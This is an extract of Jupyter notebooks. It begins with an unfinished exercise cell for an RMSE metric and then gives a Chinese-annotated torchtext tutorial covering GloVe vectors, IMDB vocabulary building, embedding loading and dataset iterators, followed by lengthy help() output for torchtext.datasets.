pred = # YOUR CODE HERE
# And now calculate the performance metric by using the evaluator on the predictions
rmse = # YOUR CODE HERE
print("RMSE = " + str(rmse))
###Output
_____no_output_____
###Markdown
Inspect ModelLet us inspect the coefficients of the last step, which tells us which of both models (linear or poisson) has more weight.
###Code
model.stages[len(model.stages)-1].coefficients
###Output
_____no_output_____ |
package use/torchtext.ipynb | ###Markdown
vectors 使用
###Code
glove_vocab = torchtext.vocab.Vectors(name='glove.6B.100d.txt',cache='H:\DBAI\word_vec\glove.6B')
examples = ['chip', 'baby', 'Beautiful']
ret = glove_vocab.get_vecs_by_tokens(examples, lower_case_backup=True)
ret.shape
###Output
_____no_output_____
###Markdown
vocab 使用
###Code
from tqdm.notebook import tqdm
import random
import os
def read_imdb(folder='train', data_root=r"H:\DBAI\BenchMark_DataSet\imdb\aclImdb"):
data = []
for label in ['pos', 'neg']:
folder_name = os.path.join(data_root, folder, label)
for file in tqdm(os.listdir(folder_name)):
with open(os.path.join(folder_name, file), 'rb') as f:
review = f.read().decode('utf-8').replace('\n', '').lower()
data.append([review, 1 if label == 'pos' else 0])
random.shuffle(data)
return data
import collections
import re
def get_tokenized_imdb(data):
"""
data: list of [string, label]
"""
def tokenizer(text):
text = re.sub('\.',' . ',text)
# text = re.sub('\.',' .',text)
text = re.sub('<br />',' ',text)
return [tok.lower() for tok in text.split()]
return [tokenizer(review) for review, _ in data]
def get_vocab_imdb(data):
tokenized_data = get_tokenized_imdb(data)
counter = collections.Counter([tk for st in tokenized_data for tk in st])
return torchtext.vocab.Vocab(counter, min_freq=5)
train_data = read_imdb('train')
vocab = get_vocab_imdb(train_data)
words = ['chip', 'baby', 'Beautiful']
[vocab.stoi[word] for word in words]
import torch
def load_pretrained_embedding(words, pretrained_vocab):
"""从预训练好的vocab中提取出words对应的词向量"""
embed = torch.zeros(len(words), pretrained_vocab.vectors[0].shape[0]) # 初始化为0
oov_count = 0 # out of vocabulary
for i, word in enumerate(words):
try:
idx = pretrained_vocab.stoi[word]
embed[i, :] = pretrained_vocab.vectors[idx]
except KeyError:
oov_count += 1
# print(word)
if oov_count > 0:
print("There are %d oov words." % oov_count)
return embed
load_pretrained_embedding(vocab.itos[8:9], glove_vocab)
# vocab.itos[8]
###Output
_____no_output_____
###Markdown
其他一整套原生的使用方式(不打算探究) Field本来是为了配置数据字段,但被赋予了过多功能 数据集的相关操作也被封装起来,但我觉得这在应用层面会有相当多的调整,并不适合封装 数据集的抓取倒是一个不错的资源管道 dataset使用
###Code
# set up fields
TEXT = torchtext.data.Field(lower=True, include_lengths=False, batch_first=True)
LABEL = torchtext.data.Field(sequential=False)
# make splits for data
train, test = torchtext.datasets.IMDB.splits(TEXT, LABEL, root=r'H:\DBAI\BenchMark_DataSet')
# build the vocabulary
TEXT.build_vocab(train,
vectors=torchtext.vocab.Vectors(name='glove.6B.100d.txt',
cache='H:\DBAI\word_vec\glove.6B'))
LABEL.build_vocab(train)
# make iterator for splits
train_iter, test_iter = torchtext.data.BucketIterator.splits(
(train, test), batch_size=3, device=0)
for idx,batch in enumerate(train_iter):
print(batch,idx)
print(batch.text)
if idx==0:break
len(train_iter)
help(torchtext.datasets)
###Output
Help on package torchtext.datasets in torchtext:
NAME
torchtext.datasets
PACKAGE CONTENTS
babi
imdb
language_modeling
nli
sequence_tagging
sst
text_classification
translation
trec
unsupervised_learning
CLASSES
torch.utils.data.dataset.Dataset(builtins.object)
torchtext.datasets.text_classification.TextClassificationDataset
torchtext.datasets.unsupervised_learning.EnWik9
torchtext.data.dataset.Dataset(torch.utils.data.dataset.Dataset)
torchtext.datasets.babi.BABI20
torchtext.datasets.imdb.IMDB
torchtext.datasets.language_modeling.LanguageModelingDataset
torchtext.datasets.language_modeling.PennTreebank
torchtext.datasets.language_modeling.WikiText103
torchtext.datasets.language_modeling.WikiText2
torchtext.datasets.sequence_tagging.SequenceTaggingDataset
torchtext.datasets.sequence_tagging.CoNLL2000Chunking
torchtext.datasets.sequence_tagging.UDPOS
torchtext.datasets.sst.SST
torchtext.datasets.translation.TranslationDataset
torchtext.datasets.translation.IWSLT
torchtext.datasets.translation.Multi30k
torchtext.datasets.translation.WMT14
torchtext.datasets.trec.TREC
torchtext.datasets.nli.NLIDataset(torchtext.data.dataset.TabularDataset)
torchtext.datasets.nli.MultiNLI
torchtext.datasets.nli.SNLI
torchtext.datasets.nli.XNLI
class BABI20(torchtext.data.dataset.Dataset)
| BABI20(path, text_field, only_supporting=False, **kwargs)
|
| Defines a dataset composed of Examples along with its Fields.
|
| Attributes:
| sort_key (callable): A key to use for sorting dataset examples for batching
| together examples with similar lengths to minimize padding.
| examples (list(Example)): The examples in this dataset.
| fields (dict[str, Field]): Contains the name of each column or field, together
| with the corresponding Field object. Two fields with the same Field object
| will have a shared vocabulary.
|
| Method resolution order:
| BABI20
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, only_supporting=False, **kwargs)
| Create a dataset from a list of Examples and Fields.
|
| Arguments:
| examples: List of Examples.
| fields (List(tuple(str, Field))): The Fields to use in this tuple. The
| string is a field name, and the Field is the associated field.
| filter_pred (callable or None): Use only examples for which
| filter_pred(example) is True, or use all examples if None.
| Default is None.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| iters(batch_size=32, root='.data', memory_size=50, task=1, joint=False, tenK=False, only_supporting=False, sort=False, shuffle=False, device=None, **kwargs) from builtins.type
|
| splits(text_field, path=None, root='.data', task=1, joint=False, tenK=False, only_supporting=False, train=None, validation=None, test=None, **kwargs) from builtins.type
| Create Dataset objects for multiple splits of a dataset.
|
| Arguments:
| path (str): Common prefix of the splits' file paths, or None to use
| the result of cls.download(root).
| root (str): Root dataset storage directory. Default is '.data'.
| train (str): Suffix to add to path for the train set, or None for no
| train set. Default is None.
| validation (str): Suffix to add to path for the validation set, or None
| for no validation set. Default is None.
| test (str): Suffix to add to path for the test set, or None for no test
| set. Default is None.
| Remaining keyword arguments: Passed to the constructor of the
| Dataset (sub)class being used.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if provided.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = ''
|
| urls = ['http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2....
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class CoNLL2000Chunking(SequenceTaggingDataset)
| CoNLL2000Chunking(path, fields, encoding='utf-8', separator='\t', **kwargs)
|
| Defines a dataset for sequence tagging. Examples in this dataset
| contain paired lists -- paired list of words and tags.
|
| For example, in the case of part-of-speech tagging, an example is of the
| form
| [I, love, PyTorch, .] paired with [PRON, VERB, PROPN, PUNCT]
|
| See torchtext/test/sequence_tagging.py on how to use this class.
|
| Method resolution order:
| CoNLL2000Chunking
| SequenceTaggingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(fields, root='.data', train='train.txt', test='test.txt', validation_frac=0.1, **kwargs) from builtins.type
| Downloads and loads the CoNLL 2000 Chunking dataset.
| NOTE: There is only a train and test dataset so we use
| 10% of the train set as validation
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'conll2000'
|
| urls = ['https://www.clips.uantwerpen.be/conll2000/chunking/train.txt....
|
| ----------------------------------------------------------------------
| Methods inherited from SequenceTaggingDataset:
|
| __init__(self, path, fields, encoding='utf-8', separator='\t', **kwargs)
| Create a dataset from a list of Examples and Fields.
|
| Arguments:
| examples: List of Examples.
| fields (List(tuple(str, Field))): The Fields to use in this tuple. The
| string is a field name, and the Field is the associated field.
| filter_pred (callable or None): Use only examples for which
| filter_pred(example) is True, or use all examples if None.
| Default is None.
|
| ----------------------------------------------------------------------
| Static methods inherited from SequenceTaggingDataset:
|
| sort_key(example)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class EnWik9(torch.utils.data.dataset.Dataset)
| EnWik9(begin_line=0, num_lines=6348957, root='.data')
|
| Compressed size of first 10^9 bytes of enwiki-20060303-pages-articles.xml.
| It's part of Large Text Compression Benchmark project
|
| Method resolution order:
| EnWik9
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __getitem__(self, i)
|
| __init__(self, begin_line=0, num_lines=6348957, root='.data')
| Initiate EnWik9 dataset.
|
| Arguments:
| begin_line: the number of beginning line. Default: 0
| num_lines: the number of lines to be loaded. Default: 6348957
| root: Directory where the datasets are saved. Default: ".data"
| data: a list of label/tokens tuple. tokens are a tensor after
|
| Examples:
| >>> from torchtext.datasets import EnWik9
| >>> enwik9 = EnWik9(num_lines=20000)
| >>> vocab = enwik9.get_vocab()
|
| __iter__(self)
|
| __len__(self)
|
| get_vocab(self)
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class IMDB(torchtext.data.dataset.Dataset)
| IMDB(path, text_field, label_field, **kwargs)
|
| Defines a dataset composed of Examples along with its Fields.
|
| Attributes:
| sort_key (callable): A key to use for sorting dataset examples for batching
| together examples with similar lengths to minimize padding.
| examples (list(Example)): The examples in this dataset.
| fields (dict[str, Field]): Contains the name of each column or field, together
| with the corresponding Field object. Two fields with the same Field object
| will have a shared vocabulary.
|
| Method resolution order:
| IMDB
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, label_field, **kwargs)
| Create an IMDB dataset instance given a path and fields.
|
| Arguments:
| path: Path to the dataset's highest level directory
| text_field: The field that will be used for text data.
| label_field: The field that will be used for label data.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the IMDB dataset.
|
| Arguments:
| batch_size: Batch_size
| device: Device to create batches on. Use - 1 for CPU and None for
| the currently active GPU device.
| root: The root directory that contains the imdb dataset subdirectory
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
|
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, label_field, root='.data', train='train', test='test', **kwargs) from builtins.type
| Create dataset objects for splits of the IMDB dataset.
|
| Arguments:
| text_field: The field that will be used for the sentence.
| label_field: The field that will be used for label data.
| root: Root dataset storage directory. Default is '.data'.
| train: The directory that contains the training examples
| test: The directory that contains the test examples
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'aclImdb'
|
| name = 'imdb'
|
| urls = ['http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.g...
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class IWSLT(TranslationDataset)
| IWSLT(path, exts, fields, **kwargs)
|
| The IWSLT 2016 TED talk translation task
|
| Method resolution order:
| IWSLT
| TranslationDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(exts, fields, root='.data', train='train', validation='IWSLT16.TED.tst2013', test='IWSLT16.TED.tst2014', **kwargs) from builtins.type
| Create dataset objects for splits of the IWSLT dataset.
|
| Arguments:
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| root: Root dataset storage directory. Default is '.data'.
| train: The prefix of the train data. Default: 'train'.
| validation: The prefix of the validation data. Default: 'val'.
| test: The prefix of the test data. Default: 'test'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| clean(path)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| base_dirname = '{}-{}'
|
| base_url = 'https://wit3.fbk.eu/archive/2016-01//texts/{}/{}/{}.tgz'
|
| name = 'iwslt'
|
| ----------------------------------------------------------------------
| Methods inherited from TranslationDataset:
|
| __init__(self, path, exts, fields, **kwargs)
| Create a TranslationDataset given paths and fields.
|
| Arguments:
| path: Common prefix of paths to the data files for both languages.
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Static methods inherited from TranslationDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class LanguageModelingDataset(torchtext.data.dataset.Dataset)
| LanguageModelingDataset(path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
|
| Defines a dataset for language modeling.
|
| Method resolution order:
| LanguageModelingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
| Create a LanguageModelingDataset given a path and a field.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| newline_eos: Whether to add an <eos> token for every newline in the
| data file. Default: True.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| splits(path=None, root='.data', train=None, validation=None, test=None, **kwargs) from builtins.type
| Create Dataset objects for multiple splits of a dataset.
|
| Arguments:
| path (str): Common prefix of the splits' file paths, or None to use
| the result of cls.download(root).
| root (str): Root dataset storage directory. Default is '.data'.
| train (str): Suffix to add to path for the train set, or None for no
| train set. Default is None.
| validation (str): Suffix to add to path for the validation set, or None
| for no validation set. Default is None.
| test (str): Suffix to add to path for the test set, or None for no test
| set. Default is None.
| Remaining keyword arguments: Passed to the constructor of the
| Dataset (sub)class being used.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if provided.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class Multi30k(TranslationDataset)
| Multi30k(path, exts, fields, **kwargs)
|
| The small-dataset WMT 2016 multimodal task, also known as Flickr30k
|
| Method resolution order:
| Multi30k
| TranslationDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(exts, fields, root='.data', train='train', validation='val', test='test2016', **kwargs) from builtins.type
| Create dataset objects for splits of the Multi30k dataset.
|
| Arguments:
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| root: Root dataset storage directory. Default is '.data'.
| train: The prefix of the train data. Default: 'train'.
| validation: The prefix of the validation data. Default: 'val'.
| test: The prefix of the test data. Default: 'test'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'multi30k'
|
| urls = ['http://www.quest.dcs.shef.ac.uk/wmt16_files_mmt/training.tar....
|
| ----------------------------------------------------------------------
| Methods inherited from TranslationDataset:
|
| __init__(self, path, exts, fields, **kwargs)
| Create a TranslationDataset given paths and fields.
|
| Arguments:
| path: Common prefix of paths to the data files for both languages.
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Static methods inherited from TranslationDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class MultiNLI(NLIDataset)
| MultiNLI(path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
|
| Defines a Dataset of columns stored in CSV, TSV, or JSON format.
|
| Method resolution order:
| MultiNLI
| NLIDataset
| torchtext.data.dataset.TabularDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(text_field, label_field, parse_field=None, genre_field=None, root='.data', train='multinli_1.0_train.jsonl', validation='multinli_1.0_dev_matched.jsonl', test='multinli_1.0_dev_mismatched.jsonl') from builtins.type
| Create dataset objects for splits of the SNLI dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for premise and hypothesis
| data.
| label_field: The field that will be used for label data.
| parse_field: The field that will be used for shift-reduce parser
| transitions, or None to not include them.
| extra_fields: A dict[json_key: Tuple(field_name, Field)]
| root: The root directory that the dataset's zip archive will be
| expanded into.
| train: The filename of the train data. Default: 'train.jsonl'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'dev.jsonl'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'test.jsonl'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'multinli_1.0'
|
| name = 'multinli'
|
| urls = ['http://www.nyu.edu/projects/bowman/multinli/multinli_1.0.zip'...
|
| ----------------------------------------------------------------------
| Class methods inherited from NLIDataset:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, trees=False, **kwargs) from builtins.type
| Create iterator objects for splits of the SNLI dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| trees: Whether to include shift-reduce parser transitions.
| Default: False.
| Remaining keyword arguments: Passed to the splits method.
|
| ----------------------------------------------------------------------
| Static methods inherited from NLIDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.TabularDataset:
|
| __init__(self, path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
| Create a TabularDataset given a path, file format, and field list.
|
| Arguments:
| path (str): Path to the data file.
| format (str): The format of the data file. One of "CSV", "TSV", or
| "JSON" (case-insensitive).
| fields (list(tuple(str, Field)) or dict[str: tuple(str, Field)]:
| If using a list, the format must be CSV or TSV, and the values of the list
| should be tuples of (name, field).
| The fields should be in the same order as the columns in the CSV or TSV
| file, while tuples of (name, None) represent columns that will be ignored.
|
| If using a dict, the keys should be a subset of the JSON keys or CSV/TSV
| columns, and the values should be tuples of (name, field).
| Keys not present in the input dictionary are ignored.
| This allows the user to rename columns from their JSON/CSV/TSV key names
| and also enables selecting a subset of columns to load.
| skip_header (bool): Whether to skip the first line of the input file.
| csv_reader_params(dict): Parameters to pass to the csv reader.
| Only relevant when format is csv or tsv.
| See
| https://docs.python.org/3/library/csv.html#csv.reader
| for more details.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
